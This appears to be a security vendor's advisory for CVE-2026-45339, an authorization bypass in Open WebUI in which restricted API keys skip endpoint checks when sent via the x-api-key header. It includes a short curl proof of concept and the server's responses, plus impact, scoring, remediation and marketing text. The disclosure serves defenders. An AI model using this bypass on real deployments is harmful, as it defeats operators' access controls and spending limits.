CVE-2026-45339

CVE-2026-45339 is a medium-severity incorrect authorization vulnerability in open-webu (pip), affecting versions <= 0.8.12. It is fixed in 0.9.0.

Summary

Open WebUI allows admins to restrict which API endpoints an API key can access. When an API key is restricted from /api/v1/messages, requests using the Authorization: Bearer sk-... header are correctly blocked with 403. However, the same key sent via the x-api-key header bypasses the restriction entirely, the request is authenticated, the model is invoked, and a full response is returned.

Details

Open WebUI's Anthropic-compatible API path accepts authentication via x-api-key header (standard for the Anthropic API). The endpoint restriction check only applies to keys presented via the Authorization header. When the same sk-... key is supplied in x-api-key, the restriction check is skipped but the key is still valid for authentication.

This means any API key, regardless of its configured endpoint restrictions, can access any API endpoint by simply using x-api-key instead of Authorization.

PoC

Verified against Open WebUI v0.8.11.

Setup: Admin creates a user with an API key that has endpoint restrictions (not allowed on /api/v1/messages). A mock OpenAI-compatible model (mock-model) is configured.

API_KEY="sk-dc56016d720e49ba9e95584d602b79bb"

# Test 1: Authorization header, BLOCKED (endpoint restriction enforced)
curl -s -X POST http://target:8080/api/v1/messages \
  -H "Authorization: Bearer $API_KEY" \
  -H 'Content-Type: application/json' \
  -d '{"model":"mock-model","messages":[{"role":"user","content":"via Authorization header"}]}'

# Test 2: x-api-key header, BYPASS (same key, restriction skipped)
curl -s -X POST http://target:8080/api/v1/messages \
  -H "x-api-key: $API_KEY" \
  -H 'Content-Type: application/json' \
  -d '{"model":"mock-model","messages":[{"role":"user","content":"via x-api-key header"}]}'

Verified output:

# Authorization header:
{"detail":"API key not allowed to access this endpoint."}

# x-api-key header (SAME key):
{"id":"chatcmpl-mock","type":"message","role":"assistant","content":[{"type":"text","text":"MOCK-CHAT-RESPONSE"}],"model":"mock-model","usage":{"input_tokens":1,"output_tokens":1}}

The same API key is rejected via Authorization (403) but fully processed via x-api-key (200 with model response).

Impact

Any API key with endpoint restrictions can bypass those restrictions by using the x-api-key header instead of Authorization. This undermines the entire API key permission model:

  • Keys restricted from chat/completion endpoints can still send messages and receive LLM responses
  • Keys restricted from admin endpoints may access admin functionality
  • The operator's intended access control is silently ineffective
  • API credit spend cannot be controlled through endpoint restrictions

The application does not correctly enforce access controls, allowing a principal to access resources or operations beyond their granted permissions. Typical impact: unauthorized data access or execution of privileged operations.

CVE-2026-45339 has a CVSS score of 6.5 (Medium). The vector is network-reachable, high privileges required, and no user interaction. A CVSS score reflects the worst-case severity of the vulnerability, not your specific exposure. Whether this affects your application depends on whether the vulnerable code is present and reachable in your environment. A fixed version is available (0.9.0); upgrading removes the vulnerable code path.

Affected versions

open-webu (<= 0.8.12)

Security releases

open-webu → 0.9.0 (pip)

Kodem intelligence

Severity tells you how bad this could be in the worst case. It does not tell you whether you are exposed. Exploitability and impact are functions of runtime truth: whether the vulnerable code is present, reachable, and actually executes in your application. A vulnerable package can sit in your dependency tree and never run.

Kodem, an Intelligent Application Security platform, uses runtime intelligence to reveal which vulnerabilities actually execute in production, so teams prioritize the ones that genuinely matter. Kodem's runtime-powered SCA identifies whether this CVE is reachable in your applications.

See it in your environment

Remediation advice

Upgrade open-webu to 0.9.0 or later to resolve this vulnerability.

Kodem Kai can prioritize this vulnerability in your dependency tree and generate a fix recommendation.

Frequently Asked Questions

  1. What is CVE-2026-45339? CVE-2026-45339 is a medium-severity incorrect authorization vulnerability in open-webu (pip), affecting versions <= 0.8.12. It is fixed in 0.9.0. The application does not correctly enforce access controls, allowing a principal to access resources or operations beyond their granted permissions.
  2. How severe is CVE-2026-45339? CVE-2026-45339 has a CVSS score of 6.5 (Medium). This score reflects the worst-case severity of the vulnerability, not your specific exposure. Whether it represents real risk in your environment depends on whether the vulnerable code is present and reachable.
  3. Which versions of open-webu are affected by CVE-2026-45339? open-webu (pip) versions <= 0.8.12 is affected.
  4. Is there a fix for CVE-2026-45339? Yes. CVE-2026-45339 is fixed in 0.9.0. Upgrade to this version or later.
  5. Is CVE-2026-45339 exploitable, and should I be worried? Whether CVE-2026-45339 is exploitable in your environment depends on whether the vulnerable code is present and reachable. A CVSS score is a worst-case rating; it does not account for your specific deployment, configuration, or usage patterns. Kodem, an Intelligent Application Security platform, uses runtime intelligence to show which vulnerabilities actually execute in production, so you can focus on the ones that represent real risk. Get a demo
  6. What actually determines whether CVE-2026-45339 is exploitable, and how bad it is? Exploitability and impact are not fixed properties of a CVE. They depend on runtime truth: whether the vulnerable code is present, reachable, and actually executes in your application. A high CVSS score on a dependency that never runs is not the same as real risk. Kodem, an Intelligent Application Security platform, uses runtime intelligence to reveal which vulnerabilities actually execute in production, so teams prioritize the ones that genuinely matter.
  7. How do I fix CVE-2026-45339? Upgrade open-webu to 0.9.0 or later.

Other vulnerabilities in open-webu

Stop the waste.
Protect your environment with Kodem.